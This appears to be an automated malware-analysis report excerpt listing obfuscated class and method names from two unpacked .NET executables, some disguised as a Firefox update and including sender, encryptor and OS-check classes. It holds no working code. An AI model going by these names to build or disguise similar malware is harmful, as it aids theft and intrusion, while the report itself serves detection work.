Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, tYQZR1Ib0hQj7XnF8r/pQOsxFqHNBTHMKICJi.cs	High entropy of concatenated method names: 'z89jYCuu8jasr', '.ctor', '.cctor', 'q4Uogt1pEj3ZCLWEeZS', 'R8Xb9l1vkOMSGRjZ2dI', 'numFgg1wI0or70kSLQm', 'XjSp4E1AOo6soUDHREK', 'yOnqJ41jLBXmJfUxNsv', 'XvUKVC1tBug6GM6RPWF', 'RtnEJA1LSi0vFPDrAOg'
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, SjTQM5UEH09TZvCBNQ/xeocNANdcCHOgP7OWh.cs	High entropy of concatenated method names: 'Uodu8eocN', 'LdcGCHOgP', 'X5EaH09TZ', 'MCBDNQY1Q', 'LDwxUDTfk', 'M7dHRGEt5', 'eLCC6Hii5', 'rSXiGgQUj', 'QMxcGZ0hw', 'cJ6foemTe'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	High entropy of concatenated method names: '.cctor', 'OvVjYCuFAlad7', 'rl8sP6X96L', 'REHsmCchwB', 'LHVsottk80', 'oPTsZklSy7', 'E1Ds9wOk8p', 'fIusO2KbRC', 'moGsry2SfI', 'GUPsM2B7K3'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, UWlJsCyaOQMxGZ0hwg/DULC6HGii53SXGgQUj.cs	High entropy of concatenated method names: 'otYoQZR1b', 'YhQZj7XnF', 'yrd9qLcIk', 'J37Ol65ac', '.ctor', '.cctor', 'isVhIQO9yZWH4ypLRh', 'Lq4PjLa4a2LF7fS2wX', 'YydUMgc0KPocGGLFAb', 'FXGUEgnWMQYm4ItbTQ'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, firefox__update__/Form1.cs	High entropy of concatenated method names: '.ctor', 'xVUssvV1E', 'Dispose', 'A5wgvVMUY', 'pKdo8XWGoOsgQjos7d', 'yULQIei1GfkTm2maWe', 'cNHHdqm5PFGEbCj8Dg', 'UqC35KyKRIVVw89Ue2', 'lQbKCvBTMVXpODvGto', 'g06tPbu73i30c9onES'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, nX0mBKtVA2eUKIDliJ/fXO6EY6gEbWNWKK9Cj.cs	High entropy of concatenated method names: 'BsjsIXkHZp', 'd3lsJiZOOp', 'BqTs8UfEEu', 'VNoseB1j6W', '.ctor', 'kb0SVUKbQhRqDrgnF5Y', 'DNO6lvK2TXdN2NyXOU4', 'sE6V85KQRZ0A0tcIkym', 'pPSaBbK5Y3Ts4OuyjD7', 'vT4m29KziratJFvKokR'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, ScPfa2xyWrFsaqJBUb/Ma66X2lVGA2LtHmMkT.cs	High entropy of concatenated method names: 'K3HswQYnPA', 'iaRssCiOw6', 'R4csgtNT6I', 'hAtsK5Onjp', 'AJZToq4TEi6FNVTCDiI', 'mANFZ24NxMQBuf1CRNa', 'kJLaPD4ZgLlSmj8OwIe', 'lJfGOc4PDPBmXrvdt4V', 'DlPiNy4qcR9ry5KfpVI', 'JGsheT4glXX1SdwQYT7'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, q7iTrl3YdW6nh111AJ/ryJmBDfTE3UWCEj4o5.cs	High entropy of concatenated method names: 'YVPsCe6pQX', 'ppSsiLswFg', 'RItsFooHjL', '.ctor', 'KmgJFyK868J0XOJFMRa', 'nBvMbIKd65DEa8YEAPW', 'qmkfE6KssL6PBUyJ8q1', 'Tyjw9XK0wHUj0chxwUq', 'WOC69KK78acDBhKuydH', 'XF6swXK6xbg1NmXR6mb'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, msdrUqitfIrobRCTeG/UQqLIeCeS5jONLNfOL.cs	High entropy of concatenated method names: 'u9AshMnJUX', 'W7vsugFXH9', 'dhSsGqk6Es', 'GPssyI4S5F', 'KuVsa2JnZ6', 'ULssDjhN8f', '.ctor', 'E7bUxRKDUnqVJYEgOf3', 'E6RVDOKS05s655t21am', 'eB1IvNKMmpCWl9t0jT5'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs	High entropy of concatenated method names: 'xc0sNNEj3H', 'xSdsUM58vD', '.ctor', 'HGKf1a4HyKhHV7g2nUj', 'yctOpJ42714NanmOKpg', 'RssmxF4QuAsFYEH2xJ5', 'VfFxq74bdqvU8Da6VAj', 'DxwdD645jd2qDSAMYRp', 'hQeMJh4zWs4TvIJy11q', 'DhY7PIKXDePQN3eoPdJ'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, AMhd1qDj6WMwSuKo68/w6oemTaeIKLar9g4Zc.cs	High entropy of concatenated method names: 'Rr7MKUM9p', 'QeH0OyaK1', 'zS9zLOaQf', '.ctor', 'ji0poc4xGIyOf66sHVW', 'zKxtjd4UU9vGtecGSLQ', 'GJ2Y464rv5jJPaFibsY', 'WfqQ5P4lWvix2ZTMKG1', 'UTpBJU48vqlKKFiHlD7', 'cSGICM4dDyNd5f9mUuw'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, rkahhccbyGtRtxNhFB/Wu2Xn0FhsPa3wAlKsu.cs	High entropy of concatenated method names: 'flhslprA99', 'LeXsxPpEbx', 'cj0sHO9JrN', 'S5CsbRtxCp', '.ctor', 'CFiXmTKJY2wvERBcMPX', 'U6KJfdKFwdPQD1HSRpN', 'SklDcrKElSeN1yLGLbM', 'sxLgRsKfJ7W8TURXxPQ', 'pRYHb7KkfIEm4xvMaTL'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, tYQZR1Ib0hQj7XnF8r/pQOsxFqHNBTHMKICJi.cs	High entropy of concatenated method names: 'z89jYCuu8jasr', '.ctor', '.cctor', 'q4Uogt1pEj3ZCLWEeZS', 'R8Xb9l1vkOMSGRjZ2dI', 'numFgg1wI0or70kSLQm', 'XjSp4E1AOo6soUDHREK', 'yOnqJ41jLBXmJfUxNsv', 'XvUKVC1tBug6GM6RPWF', 'RtnEJA1LSi0vFPDrAOg'
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, SjTQM5UEH09TZvCBNQ/xeocNANdcCHOgP7OWh.cs	High entropy of concatenated method names: 'Uodu8eocN', 'LdcGCHOgP', 'X5EaH09TZ', 'MCBDNQY1Q', 'LDwxUDTfk', 'M7dHRGEt5', 'eLCC6Hii5', 'rSXiGgQUj', 'QMxcGZ0hw', 'cJ6foemTe'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	High entropy of concatenated method names: '.cctor', 'OvVjYCuFAlad7', 'rl8sP6X96L', 'REHsmCchwB', 'LHVsottk80', 'oPTsZklSy7', 'E1Ds9wOk8p', 'fIusO2KbRC', 'moGsry2SfI', 'GUPsM2B7K3'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, UWlJsCyaOQMxGZ0hwg/DULC6HGii53SXGgQUj.cs	High entropy of concatenated method names: 'otYoQZR1b', 'YhQZj7XnF', 'yrd9qLcIk', 'J37Ol65ac', '.ctor', '.cctor', 'isVhIQO9yZWH4ypLRh', 'Lq4PjLa4a2LF7fS2wX', 'YydUMgc0KPocGGLFAb', 'FXGUEgnWMQYm4ItbTQ'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, firefox__update__/Form1.cs	High entropy of concatenated method names: '.ctor', 'xVUssvV1E', 'Dispose', 'A5wgvVMUY', 'pKdo8XWGoOsgQjos7d', 'yULQIei1GfkTm2maWe', 'cNHHdqm5PFGEbCj8Dg', 'UqC35KyKRIVVw89Ue2', 'lQbKCvBTMVXpODvGto', 'g06tPbu73i30c9onES'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, ScPfa2xyWrFsaqJBUb/Ma66X2lVGA2LtHmMkT.cs	High entropy of concatenated method names: 'K3HswQYnPA', 'iaRssCiOw6', 'R4csgtNT6I', 'hAtsK5Onjp', 'AJZToq4TEi6FNVTCDiI', 'mANFZ24NxMQBuf1CRNa', 'kJLaPD4ZgLlSmj8OwIe', 'lJfGOc4PDPBmXrvdt4V', 'DlPiNy4qcR9ry5KfpVI', 'JGsheT4glXX1SdwQYT7'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, nX0mBKtVA2eUKIDliJ/fXO6EY6gEbWNWKK9Cj.cs	High entropy of concatenated method names: 'BsjsIXkHZp', 'd3lsJiZOOp', 'BqTs8UfEEu', 'VNoseB1j6W', '.ctor', 'kb0SVUKbQhRqDrgnF5Y', 'DNO6lvK2TXdN2NyXOU4', 'sE6V85KQRZ0A0tcIkym', 'pPSaBbK5Y3Ts4OuyjD7', 'vT4m29KziratJFvKokR'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, q7iTrl3YdW6nh111AJ/ryJmBDfTE3UWCEj4o5.cs	High entropy of concatenated method names: 'YVPsCe6pQX', 'ppSsiLswFg', 'RItsFooHjL', '.ctor', 'KmgJFyK868J0XOJFMRa', 'nBvMbIKd65DEa8YEAPW', 'qmkfE6KssL6PBUyJ8q1', 'Tyjw9XK0wHUj0chxwUq', 'WOC69KK78acDBhKuydH', 'XF6swXK6xbg1NmXR6mb'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs	High entropy of concatenated method names: 'xc0sNNEj3H', 'xSdsUM58vD', '.ctor', 'HGKf1a4HyKhHV7g2nUj', 'yctOpJ42714NanmOKpg', 'RssmxF4QuAsFYEH2xJ5', 'VfFxq74bdqvU8Da6VAj', 'DxwdD645jd2qDSAMYRp', 'hQeMJh4zWs4TvIJy11q', 'DhY7PIKXDePQN3eoPdJ'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, msdrUqitfIrobRCTeG/UQqLIeCeS5jONLNfOL.cs	High entropy of concatenated method names: 'u9AshMnJUX', 'W7vsugFXH9', 'dhSsGqk6Es', 'GPssyI4S5F', 'KuVsa2JnZ6', 'ULssDjhN8f', '.ctor', 'E7bUxRKDUnqVJYEgOf3', 'E6RVDOKS05s655t21am', 'eB1IvNKMmpCWl9t0jT5'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, AMhd1qDj6WMwSuKo68/w6oemTaeIKLar9g4Zc.cs	High entropy of concatenated method names: 'Rr7MKUM9p', 'QeH0OyaK1', 'zS9zLOaQf', '.ctor', 'ji0poc4xGIyOf66sHVW', 'zKxtjd4UU9vGtecGSLQ', 'GJ2Y464rv5jJPaFibsY', 'WfqQ5P4lWvix2ZTMKG1', 'UTpBJU48vqlKKFiHlD7', 'cSGICM4dDyNd5f9mUuw'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, rkahhccbyGtRtxNhFB/Wu2Xn0FhsPa3wAlKsu.cs	High entropy of concatenated method names: 'flhslprA99', 'LeXsxPpEbx', 'cj0sHO9JrN', 'S5CsbRtxCp', '.ctor', 'CFiXmTKJY2wvERBcMPX', 'U6KJfdKFwdPQD1HSRpN', 'SklDcrKElSeN1yLGLbM', 'sxLgRsKfJ7W8TURXxPQ', 'pRYHb7KkfIEm4xvMaTL'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, tYQZR1Ib0hQj7XnF8r/pQOsxFqHNBTHMKICJi.cs	High entropy of concatenated method names: 'z89jYCuu8jasr', '.ctor', '.cctor', 'q4Uogt1pEj3ZCLWEeZS', 'R8Xb9l1vkOMSGRjZ2dI', 'numFgg1wI0or70kSLQm', 'XjSp4E1AOo6soUDHREK', 'yOnqJ41jLBXmJfUxNsv', 'XvUKVC1tBug6GM6RPWF', 'RtnEJA1LSi0vFPDrAOg'
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, SjTQM5UEH09TZvCBNQ/xeocNANdcCHOgP7OWh.cs	High entropy of concatenated method names: 'Uodu8eocN', 'LdcGCHOgP', 'X5EaH09TZ', 'MCBDNQY1Q', 'LDwxUDTfk', 'M7dHRGEt5', 'eLCC6Hii5', 'rSXiGgQUj', 'QMxcGZ0hw', 'cJ6foemTe'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, w9w27qdF2JQYXqPwco/VZOv9gq5IfUd0bBp8d.cs	High entropy of concatenated method names: 'V5Q2E013y', 'kt4mB0uWw', '.ctor', 'C0HMwtKM5', 'XqUH4NWxv', 'rB6UBmArX', 'X9Eigl4Sc', 'V7e0LJbOY', 'A7xsgG7rg', 'b92GIxeds'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, sdown_download_WGmTBkDjVnygWHhK._374097b9_ba82_4f5b_9f70_e63b739a86c5A/WorkerProviders.cs	High entropy of concatenated method names: 'get_CreateParams', '.ctor', 'xEnQCPTGp', 'qkjle11hQ', 'sy6VcdYZO', 'Q9g65IfUd', 'zbBDp8dM9', 'O27NqF2JQ', 'WXqgPwcoj', 'Dispose'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.hWJ3R322hGjdADCEdTABkMzmNQKB5g3ZDFpbuz3Yy5a/UIDemoForm.cs	High entropy of concatenated method names: '.ctor', 'KTljuJuaR6', 'RkXjXddFNe', 'WKZjSoCLDd', 'jmOjBSbeaN', 'VOAjqGjsZw', 'gZ2jd4ByFd', 'qNxjFhc7d1', 'Dispose', 'boXjQyHANe'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, sdown_download_WGmTBkDjVnygWHhK._374097b9_ba82_4f5b_9f70_e63b739a86c5A/VerifierProcedure.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'ObrjiJoLc', 'lv8uRe2tJ', 'Dispose', 'XFhXwyfOy', 'qQhv3gPHlTyBGMPA7C', 'jBiQ8H0NMecLVb4GjD', 'Ud2rHdL23TCMHxAAdY', 'alPPqXAVHncWZJmRYa'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs	High entropy of concatenated method names: 'zTLj2wyOwE', 'wdLjmBCi6g', 'Nxbj3BYhiN', 'UGJjR0bft7', 'L4dj8cH9Bh', 'ibtjokU1o6', 'sSUjJK0WUK', 'oO2jANncFP', 'DpejarhlLf', 'a6kjwsShUe'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, TB0uWwkXHEufsessia/d4yflyyfO5QE013y6t.cs	High entropy of concatenated method names: 'bw8jvZBu8K', 'AV1jb84K7a', 'XHFj73XccH', 'KcBjWLnQy2', 'E0Lj4rgRtw', 'KTEjn2AngP', '.ctor', '.cctor', 'fyBGBFGnxc7kUHx0e7F', 'OTu8FpGe5tb7MI5D9Ss'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, u9dnx1P24QV72TnMoO/PEX9lCLevoPVSukUXf.cs	High entropy of concatenated method names: '.ctor', 'AECujemKd0', 'MiAuuQuvrg', 'K9EuXOoYCu', 'PffuSK7ef0', 'jFdi8lPLG3egGSpUGGU', 'dcLQP5PAE1aRfl3ke6M', 'C1E8F3PPg0Pq5MQB1D7', 'tafVnxP0WdTkbubQtyQ', 'v0MRITPlHOJMUy5EeEh'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.elBostagi/Sender.cs	High entropy of concatenated method names: '.ctor', 'getResponse', 'Encrypt', 'ISa5GKbXuHU5xU2QCxC', 'UE9PhPbUDCfht4L65of', 'uu5S1kbfwWfPc9rD7Co', 'xlYDmeb9B8nF8ZRR3yg', 'GXtc31bvMCp6V8bXh0M', 'cf66WbbkShSdWRToXAM', 'J967UqbJHlZ65cWVcKi'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, FmYfDRtwHaOeqQio73/K5EQdS5vU2EiwnkmOp.cs	High entropy of concatenated method names: '.ctor', 'j2xXvxrnfM', 'z8yXbPm8gV', 'TWFX7wJf5I', 'QfXXW1douy', 'xB2Do1AEQ2lat4QKbZt', 'ilDIT9A2o6GP11jgbUW', 'uMwGI2AnfHPjKBQHNsC', 'MIfHToAeNMxEpwLRZxs', 'dviBSyAge42GFgK873g'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, sTGpkkBje11hQTy6cd/c69XCCSa4y8kcBUEnC.cs	High entropy of concatenated method names: 'juVxjo5ug', 'sel1P3iLK', 'YlkKdHu7s', '.ctor', 'uuoF7bVznqK6AE3DQXh', 'MmglAYVOSb66i5SsOek', 'Rx3RcQV5dlQL0PjrGPw', 'PmYJqpCQhO3VvyEUYn8', 'DJynR5CVlDuIPERQwSk', 'hbZUsVCC1TZGOEKrgDg'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, VYs7xggG7rgj92Ixed/LrXI9ENgl4ScO7eLJb.cs	High entropy of concatenated method names: 'NdhjGHL6VM', 'litjCaDOkA', 'XQOjrsjc0n', 'XSZjhPV6Jt', 'L96j5g3l8r', 'uSTjtkujjH', '.ctor', 'R7nZpdsEy0FfowSHrfY', 'aSHHFws2AURsXPMQCqf', 'gpdVJFsgeFmaxvwciHO'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.FyQn7yEvAKMfXCA2smMK/Cryptor.cs	High entropy of concatenated method names: 'encrypt', 'decrypt', '.ctor', '.cctor', 'G7gRPAstQnksmbaL8k6', 'HNoW6YswUAUGLgya5Y5', 'fsP3C1suEpLFwxXgap9', 'QAZ5jEsNUcMUfN8NG2p', 'vujPXxsMhXW5SIIBjJS', 'BpRo7HspoSQspMuCWbZ'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, OT1UO78FqpHfaj3LJh/eryTP8RVkcWa6d2rXG.cs	High entropy of concatenated method names: 'kL57Ufjj3HtcK', '.ctor', '.cctor', 'gdgIHrdY5PWs5SYjdso', 'SLfp5qdIMhtXf9Hk0Tk', 'J0sa79dKyL2xyJXTfIm', 'aTE94md3RAtS21jrrvS', 'HSTBtBdH5HhgFBMt9uL', 'y8UE3Md40MIyqKIF60M', 'auCyojdxQhvTNWAMX3q'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, P8QpTkVVuVjo5ugPel/HdWG1slNbM1cXiS0LZ.cs	High entropy of concatenated method names: 'nb7eSNXHQ', 'pB1vlhulg', 'dPlbTw64WbOfEZL3qBH', 'Dm38X06xgrGP5s1JnYA', 'jERXFc6YoIQXB8tK5PN', 'GYZuFe6I1MkG2x0LxrJ', 'JbjiIH6Kqh7id8x81vV', 'USJ5a263NBH65i52Jiw', 'nNvXmq6HICu0W4J19Uf', 'RXIKbv6mECX7yxnqJcj'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, yUGiAdJMfLP4KuadhH/rESWQqorwdVcGanUBW.cs	High entropy of concatenated method names: '.cctor', 'A0N7UfjY4CN7a', 'XgYS6SdDWo', 'hbvSDWAGnc', 'werSNb84qN', 'dcgSgypVQY', 'VvpSENlVV3', 'fZrSpfthOb', 'S8vSyW8FJb', 'VWVSkB1b5F'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, FKM5IqDU4NWxvLB6Bm/s3iLKf6lkdHu7sr0Hw.cs	High entropy of concatenated method names: '.ctor', 'Ew1bvnMrk', 'IC07fZ5WV', 'WN6W9jlrF', 'TDRDxU6MmhUveb2fJ1K', 'hptLSU6pGwQcQn2MVwj', 'vGryxH6uFZJeaB0WsVD', 'lSq1cQ6NUA8ibK3xfTI', 'hCoDR26TQecQZpG1ng9', 'OOYNTp6yXrMUaNVQdUf'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, sNlFPXQyH5NurCceEr/bSZRdrFKIELkMaR5PM.cs	High entropy of concatenated method names: 'U7i9tP4KF', '.ctor', 'E0yQ7766GxOXFpQhimx', 'c39cwa6b2rroanM6w08', 'Y0VoGX6sls0o3NBkvTS', 'vyd8Ho6GHsxvaTGCDBY', 'zylINY6PwGULAt6gnhy', 'nr2B4T60g0H35bHcFG9', 'NC52oJ6LbKvkdMrHbXl', 'gCCuu06AsiRiJj0a1Y2'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, gZ24ByCFdkNxhc7d1j/gVmOSbGeaNOOAGjsZw.cs	High entropy of concatenated method names: 'frIuGPSPiE', 'bnkuCtf3KS', 'T4QurUa5ws', 'FYZuheJvM4', 'yxru5ERIqA', 'OKSutH7wdH', '.ctor', 'kE3h3ULQkLb3vgJym0j', 'TNOdKbLVwXrDB44b28K', 'sHEB6QLCyNgr4xVCWUk'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.tRvRu7Jr5HML52Dh2xdYFfjVXH9w6pvwvL3pHS6q/OSFilter.cs	High entropy of concatenated method names: 'checkwindows', 'Getwindows', 'checkNET', 'GetMaxValue', 'Is32Bits', 'Is64Bits', 'IsWow64Process', 'kLVusis8ZA', 'HKLM_GetString', 'EDmxU30iJ3NZTRt1KSS'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, eYmxboi0HBiRoNSKMI/nwoe9FU0x43IxvZxru.cs	High entropy of concatenated method names: 'KGJuLj7xek', 'EMGuPmjev2', 'vcyuT5fA9O', '.ctor', 'LOtVwtPJOrpsxx1LDZu', 'dsARuaP8lY5pxQDWKbw', 'AOV2spPOGgst6Bf0uJc', 'cDd5Z8PvjWNecAWT92y', 'wTC48HPkprxSEd1Q3Fq', 'PtRXv2P53E1kFOAmtVv'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, J67kXdsdFNeZKZoCLD/K6TiT10kk04NoTlJua.cs	High entropy of concatenated method names: 'm5Guxxa6Ep', 'COuu1J2LEH', '.cctor', 'AcOJVN0I8OEg6dKr9xO', 'JrkqRL0KC3cOM0mGg5Q', 'o9W4x103rESvx4drUvn', 'vSJUiv0x181lXlGcFjY', 'sXw5ie0Ys9pM32lF0pZ', 'IfDLBZ0HTtjvKxJiX2V', 'KjBnkI0mpmEQ6SR0kR9'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, zx6dUUhiYDT6ABhs6J/JXyHANreZqHXu3U7OK.cs	High entropy of concatenated method names: 'ACTXP3GOg0', 'swUXTMcUYP', 'xpXXxNfFh3', 'Qe4X1I0Q6a', 'EwuXKr7RhV', '.ctor', 'WdjKxYAVSHBoSgAwYAh', 'TPRC2dACbgB2EUlag6f', 'TBUXWLA6BVOpDx3RrF4', 'cW68N3AbH7Gn0hBj7wC'
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, doc_help_provider__hunvq97e7rkmf8ym.h8LBtNJWR7/Check.cs	High entropy of concatenated method names: 'OTPukA9jB0', 'hjNfMrPEYu6TCxGHqVI', 't9Kay3P2kLhpG1M7ete', 'rAmwV6PgGbjAQLLGV86', 'MDQHShPqUFDh4E0Rsk1', 'HOZXCePo7Scj0ZoE7wu', 'sg0DioPf00Lc8fdAgVF', 'K6fZmKP9PeyBmcpHlve', 'tonNXZPXtQEoUTLj4y8', 'LXlvmDPU1Zer9F2hWM4'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, w9w27qdF2JQYXqPwco/VZOv9gq5IfUd0bBp8d.cs	High entropy of concatenated method names: 'V5Q2E013y', 'kt4mB0uWw', '.ctor', 'C0HMwtKM5', 'XqUH4NWxv', 'rB6UBmArX', 'X9Eigl4Sc', 'V7e0LJbOY', 'A7xsgG7rg', 'b92GIxeds'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, sdown_download_WGmTBkDjVnygWHhK._374097b9_ba82_4f5b_9f70_e63b739a86c5A/WorkerProviders.cs	High entropy of concatenated method names: 'get_CreateParams', '.ctor', 'xEnQCPTGp', 'qkjle11hQ', 'sy6VcdYZO', 'Q9g65IfUd', 'zbBDp8dM9', 'O27NqF2JQ', 'WXqgPwcoj', 'Dispose'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.hWJ3R322hGjdADCEdTABkMzmNQKB5g3ZDFpbuz3Yy5a/UIDemoForm.cs	High entropy of concatenated method names: '.ctor', 'KTljuJuaR6', 'RkXjXddFNe', 'WKZjSoCLDd', 'jmOjBSbeaN', 'VOAjqGjsZw', 'gZ2jd4ByFd', 'qNxjFhc7d1', 'Dispose', 'boXjQyHANe'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, BFEuYWpP1YwSSXtT6i/ABv1yTEJEN5oBaDCDl.cs	High entropy of concatenated method names: 'zTLj2wyOwE', 'wdLjmBCi6g', 'Nxbj3BYhiN', 'UGJjR0bft7', 'L4dj8cH9Bh', 'ibtjokU1o6', 'sSUjJK0WUK', 'oO2jANncFP', 'DpejarhlLf', 'a6kjwsShUe'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, sdown_download_WGmTBkDjVnygWHhK._374097b9_ba82_4f5b_9f70_e63b739a86c5A/VerifierProcedure.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'ObrjiJoLc', 'lv8uRe2tJ', 'Dispose', 'XFhXwyfOy', 'qQhv3gPHlTyBGMPA7C', 'jBiQ8H0NMecLVb4GjD', 'Ud2rHdL23TCMHxAAdY', 'alPPqXAVHncWZJmRYa'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, TB0uWwkXHEufsessia/d4yflyyfO5QE013y6t.cs	High entropy of concatenated method names: 'bw8jvZBu8K', 'AV1jb84K7a', 'XHFj73XccH', 'KcBjWLnQy2', 'E0Lj4rgRtw', 'KTEjn2AngP', '.ctor', '.cctor', 'fyBGBFGnxc7kUHx0e7F', 'OTu8FpGe5tb7MI5D9Ss'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.elBostagi/Sender.cs	High entropy of concatenated method names: '.ctor', 'getResponse', 'Encrypt', 'ISa5GKbXuHU5xU2QCxC', 'UE9PhPbUDCfht4L65of', 'uu5S1kbfwWfPc9rD7Co', 'xlYDmeb9B8nF8ZRR3yg', 'GXtc31bvMCp6V8bXh0M', 'cf66WbbkShSdWRToXAM', 'J967UqbJHlZ65cWVcKi'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, yUGiAdJMfLP4KuadhH/rESWQqorwdVcGanUBW.cs	High entropy of concatenated method names: '.cctor', 'A0N7UfjY4CN7a', 'XgYS6SdDWo', 'hbvSDWAGnc', 'werSNb84qN', 'dcgSgypVQY', 'VvpSENlVV3', 'fZrSpfthOb', 'S8vSyW8FJb', 'VWVSkB1b5F'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.h8LBtNJWR7/Check.cs	High entropy of concatenated method names: 'OTPukA9jB0', 'hjNfMrPEYu6TCxGHqVI', 't9Kay3P2kLhpG1M7ete', 'rAmwV6PgGbjAQLLGV86', 'MDQHShPqUFDh4E0Rsk1', 'HOZXCePo7Scj0ZoE7wu', 'sg0DioPf00Lc8fdAgVF', 'K6fZmKP9PeyBmcpHlve', 'tonNXZPXtQEoUTLj4y8', 'LXlvmDPU1Zer9F2hWM4'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, eYmxboi0HBiRoNSKMI/nwoe9FU0x43IxvZxru.cs	High entropy of concatenated method names: 'KGJuLj7xek', 'EMGuPmjev2', 'vcyuT5fA9O', '.ctor', 'LOtVwtPJOrpsxx1LDZu', 'dsARuaP8lY5pxQDWKbw', 'AOV2spPOGgst6Bf0uJc', 'cDd5Z8PvjWNecAWT92y', 'wTC48HPkprxSEd1Q3Fq', 'PtRXv2P53E1kFOAmtVv'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, FmYfDRtwHaOeqQio73/K5EQdS5vU2EiwnkmOp.cs	High entropy of concatenated method names: '.ctor', 'j2xXvxrnfM', 'z8yXbPm8gV', 'TWFX7wJf5I', 'QfXXW1douy', 'xB2Do1AEQ2lat4QKbZt', 'ilDIT9A2o6GP11jgbUW', 'uMwGI2AnfHPjKBQHNsC', 'MIfHToAeNMxEpwLRZxs', 'dviBSyAge42GFgK873g'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, VYs7xggG7rgj92Ixed/LrXI9ENgl4ScO7eLJb.cs	High entropy of concatenated method names: 'NdhjGHL6VM', 'litjCaDOkA', 'XQOjrsjc0n', 'XSZjhPV6Jt', 'L96j5g3l8r', 'uSTjtkujjH', '.ctor', 'R7nZpdsEy0FfowSHrfY', 'aSHHFws2AURsXPMQCqf', 'gpdVJFsgeFmaxvwciHO'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, doc_help_provider__hunvq97e7rkmf8ym.FyQn7yEvAKMfXCA2smMK/Cryptor.cs	High entropy of concatenated method names: 'encrypt', 'decrypt', '.ctor', '.cctor', 'G7gRPAstQnksmbaL8k6', 'HNoW6YswUAUGLgya5Y5', 'fsP3C1suEpLFwxXgap9', 'QAZ5jEsNUcMUfN8NG2p', 'vujPXxsMhXW5SIIBjJS', 'BpRo7HspoSQspMuCWbZ'
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, zx6dUUhiYDT6ABhs6J/JXyHANreZqHXu3U7OK.cs	High entropy of concatenated method names: 'ACTXP3GOg0', 'swUXTMcUYP', 'xpXXxNfFh3', 'Qe4X1I0Q6a', 'EwuXKr7RhV', '.ctor', 'WdjKxYAVSHBoSgAwYAh', 'TPRC2dACbgB2EUlag6f', 'TBUXWLA6BVOpDx3RrF4', 'cW68N3AbH7Gn0hBj7wC'
